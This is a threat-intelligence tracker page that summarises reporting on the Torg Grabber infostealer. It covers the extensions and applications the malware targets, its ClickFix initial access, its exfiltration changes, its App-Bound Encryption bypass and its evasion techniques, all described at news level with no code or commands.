CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Torg Grabber infostealer expands to 850 browser extensions including 728 crypto wallets

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A new info-stealing malware family named Torg Grabber has been identified targeting 850 browser extensions, with over 700 focused on cryptocurrency wallets. Initial access is achieved via the ClickFix technique, involving clipboard hijacking and user tricked into executing malicious PowerShell commands. The malware rapidly evolves, with 334 unique samples compiled in three months and weekly registration of new command-and-control (C2) servers. Torg Grabber employs advanced anti-analysis, multi-layered obfuscation, direct syscalls, and reflective loading to evade detection. It exfiltrates data over HTTPS via Cloudflare, supports chunked uploads, and includes mechanisms to bypass browser cookie protection. The malware targets credentials, cookies, autofill data, and files from 25 Chromium-based browsers and 8 Firefox variants, alongside a wide range of applications including password managers, 2FA tools, messaging platforms, VPNs, and desktop crypto wallets.

Timeline

  1. 25.03.2026 20:32 1 articles · 2h ago

    Torg Grabber infostealer expands targeting to 850 browser extensions with advanced exfiltration and anti-detection mechanisms

    Torg Grabber infostealer malware was identified targeting 850 browser extensions, including 728 cryptocurrency wallet extensions, with initial access via ClickFix clipboard hijacking and PowerShell command execution. The malware rapidly evolved from Telegram and custom TCP exfiltration to HTTPS over Cloudflare infrastructure on December 18, 2025, supporting chunked uploads. By December 22, 2025, it added App-Bound Encryption bypass to circumvent browser cookie protections. Torg Grabber employs anti-analysis, multi-layered obfuscation, direct syscalls, reflective loading, and executes payloads entirely in memory. It also profiles hosts, extracts browser encryption keys via a standalone tool named Underground, and targets a wide range of applications beyond wallets, including password managers, 2FA tools, messaging platforms, VPNs, FTP clients, and email clients.

    Show sources
    Open in new tab

Information Snippets

  • Torg Grabber targets 850 browser extensions, including 728 cryptocurrency wallet extensions such as MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • Initial access is obtained via the ClickFix technique, which hijacks the clipboard and tricks users into executing malicious PowerShell commands.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • The malware has 334 unique samples compiled between December 2025 and February 2026, with new C2 servers registered weekly.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • Data exfiltration initially used Telegram-based and custom encrypted TCP protocols but shifted to HTTPS routed through Cloudflare infrastructure on December 18, 2025, supporting chunked data uploads.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • Torg Grabber features anti-analysis mechanisms, multi-layered obfuscation, direct syscalls, and reflective loading for evasion, executing payloads entirely in memory.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • On December 22, 2025, Torg Grabber added App-Bound Encryption (ABE) bypass to circumvent Chrome’s (and similar browsers’) cookie protection systems.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • The malware targets 25 Chromium-based browsers and 8 Firefox variants, stealing credentials, cookies, autofill data, and files from desktop folders.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • Torg Grabber also targets 103 password manager and 2FA extensions (e.g., LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass), alongside applications including Discord, Telegram, Steam, VPNs, FTP clients, email clients, and desktop crypto wallets.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • The malware profiles the host, creates hardware fingerprints, documents installed software (including 24 antivirus tools), takes desktop screenshots, and executes shellcode delivered in ChaCha-encrypted zlib-compressed form from the C2.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources

  • A standalone tool named Underground is used to extract browser data by injecting a DLL reflectively into the browser to access Chrome’s COM Elevation Service and extract the master encryption key.

    First reported: 25.03.2026 20:32
    1 source, 1 article
    Show sources